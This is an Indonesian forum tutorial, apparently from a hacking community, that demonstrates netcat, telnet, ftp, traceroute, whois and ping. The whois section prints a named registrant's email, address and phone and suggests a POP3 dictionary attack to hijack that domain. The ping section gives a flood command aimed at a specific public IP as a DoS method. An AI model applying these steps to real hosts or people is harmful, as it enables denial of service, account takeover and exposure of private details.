Code:

nc 192.168.1.1 80

telnet

Telnet merupakan tool yang berguna mengakses mesin lain di jaringan via nomor port yang sedang listen di mana nomor port default dari telnet daemon adalah 23, akses ke mesin lain tersebut selama ada routenya loh!!!
misal:

Code:

telnet alamat_ip/nama_host nomor_port

via telnet kita juga bisa digunakan untuk melakukan fetch terhadap suatu situs misal:

Code:

# telnet google.com 80 Trying 216.239.61.104... Connected to google.com. Escape character is '^]'. GET / HTTP/1.1

Ok berikut ini contoh penggunaan telnet untuk mengakses suatu public access unix system di mana ip public dengan sistem free bsd dg telnet daemon running:


nah ini sdf.lonestar.org di sini tempat ane dulu sering nongkrong

Code:

bt lampp # telnet sdf.lonestar.org Trying 192.94.73.1... Connected to sdf.lonestar.org. Escape character is '^]'.  sdf.lonestar.org (pts/25) if new, login 'new' ..  login: mywisdom Password: [ 'mywisdom' is not set to expire ]  Please press your BACKSPACE key: The Moon is Waxing Crescent (1% of Full)                               .                                   .                                      .                                        -.                                          \                                           \.                                             \                                              \                                              |                                               \  New Moon +                                               |  1  0:52:06                                               |  First Quarter -                                               |  6 13:04:59                                               /                                              |                                              /                                             /                                           /'                                          /                                        -'                                      '                                   '                               ' [CONTINUE]  Type 'help' for Commands. Type 'com' to chat with other users. Type 'ttytter' to listen to Twitter Tweets anonymously. Type 'mud' to play the SDFmud.  Did you know you can become a permanent LIFETIME member of SDF by making a onetime donation of $36?  Type 'arpa' for more info!  sdf:/udd/m/mywisdom>

ftp (tool)

ftp merupakan tool dasar di linux untuk mentransfer file via protokol ftp (port 21 / tcp)
untuk memulai silahkan ketikkan:

Code:

ftp

Contoh penggunaan ftp untuk mengupload file:

bt ~ # ftp yoyoparty.com
Connected to yoyoparty.com.
220 (vsFTPd 2.0.5)
Name (yoyoparty.com:root): yoyoparty
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd htmp
550 Failed to change directory.
ftp> cd html
250 Directory successfully changed.
ftp> cd upload
250 Directory successfully changed.
ftp> put gopher2.011.tar
local: gopher2.011.tar remote: gopher2.011.tar
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 File receive OK.
993280 bytes sent in 52 secs (19 Kbytes/sec)
ftp>



TraceRoute

Ini merupakan tool yang biasa dipergunakan untuk melihat rute perjalanan paket untuk mencapai tujuan dengan jumlah maximal hops sebanyak 30 . Ok untuk lebih jelasnya perhatikan
contoh berikut ini, misal kita mao melihat perjalanan paket dari mesin kita ke jasakom:

Code:

bt lampp # traceroute jasakom.com traceroute to jasakom.com (119.2.43.84), 30 hops max, 38 byte packets 1  10.17.0.1 (10.17.0.1)  19.197 ms  11.485 ms  7.685 ms 2  fm-ip-202.73.96.6.fast.net.id (202.73.96.6)  9.214 ms  7.500 ms  8.561 ms 3  fm-ip-202.73.96.5.fast.net.id (202.73.96.5)  9.109 ms  9.170 ms  7.668 ms 4  laxo.openixp.net (218.100.27.101)  8.050 ms  8.336 ms  8.057 ms 5  ip-40-100.laxo.net.id (119.2.40.100)  8.628 ms  11.468 ms  10.862 ms 6  ip-43-84.laxo.net.id (119.2.43.84)  9.747 ms  9.875 ms  9.167 ms bt lampp #

Whois

Ini merupakan tool yang digunakan untuk mendapatkan informasi tentang suatu nama domain. whois ini sering digunakan untuk mendapatkan informasi target bagi para attacker.

contoh penggunaan whois misal ketikkan:

Code:

whois solusiwebindo.com

maka akan didapat informasi yang berguna berikut ini:

Code:

01	Domain Name: SOLUSIWEBINDO.COM 02	  03	Registrant: 04	    n/a 05	    Yulianto        (goodmast3r@yahoo.com) 06	    Tanah Pasir No 5/6 RT 18/07 07	    Jakarta 08	    Jakarta,14440 09	    ID 10	    Tel. +62.8128196928 11	  12	Creation Date: 15-Nov-2006 13	Expiration Date: 15-Nov-2010 14	  15	Domain servers in listed order: 16	    dns1.masterwebnet.com 17	    dns2.masterwebnet.com 18	    dns3.masterwebnet.com 19	    dns4.masterwebnet.com 20	  21	Administrative Contact: 22	    n/a 23	    Yulianto        (goodmast3r@yahoo.com) 24	    Tanah Pasir No 5/6 RT 18/07 25	    Jakarta 26	    Jakarta,14440 27	    ID 28	    Tel. +62.8128196928 29	  30	Technical Contact: 31	    n/a 32	    Yulianto        (goodmast3r@yahoo.com) 33	    Tanah Pasir No 5/6 RT 18/07 34	    Jakarta 35	    Jakarta,14440 36	    ID 37	    Tel. +62.8128196928 38	  39	Billing Contact: 40	    n/a 41	    Yulianto        (goodmast3r@yahoo.com) 42	    Tanah Pasir No 5/6 RT 18/07 43	    Jakarta 44	    Jakarta,14440 45	    ID 46	    Tel. +62.8128196928 47	  48	Status:ACTIVE

PERHATIAN!!! hanya untuk contoh tidak dianjurkan melakukan attack web ini!!!

Dari informasi di atas didapat info email registrar domain adalah:goodmast3r@yahoo.com

Selanjutnya attacker bisa mencoba melakukan pop3 dictionary attack untuk mendapatkan akun registrar untuk kemudian bisa mengeset name server (domain hijacking).

ping
Ping ini singkatan dari packet internet gropher. Ping ini biasa kita gunakan untuk mengecek suatu host apakah alive atau tidak. Misal:

Code:

ping 192.168.1.1

Maka akan dikirim paket icmp (internet control messaging protocol) ke 192.168.1.1 , misal ip 192.168.1.1 bersistem operasi linux, jika setting icmp echo requestnya on maka host tersebut akan mereply ke mesin kita.

Oya ping ini bisa juga digunakan untuk DOS dengan mengirimkan paket icmp ukuran besar, misal kita sbg root di linux, coba ketikkan ini:

Code:

ping 67.222.131.145 -fs 50000

Ok sekian dulu akan saya lanjutkan di bagian ke dua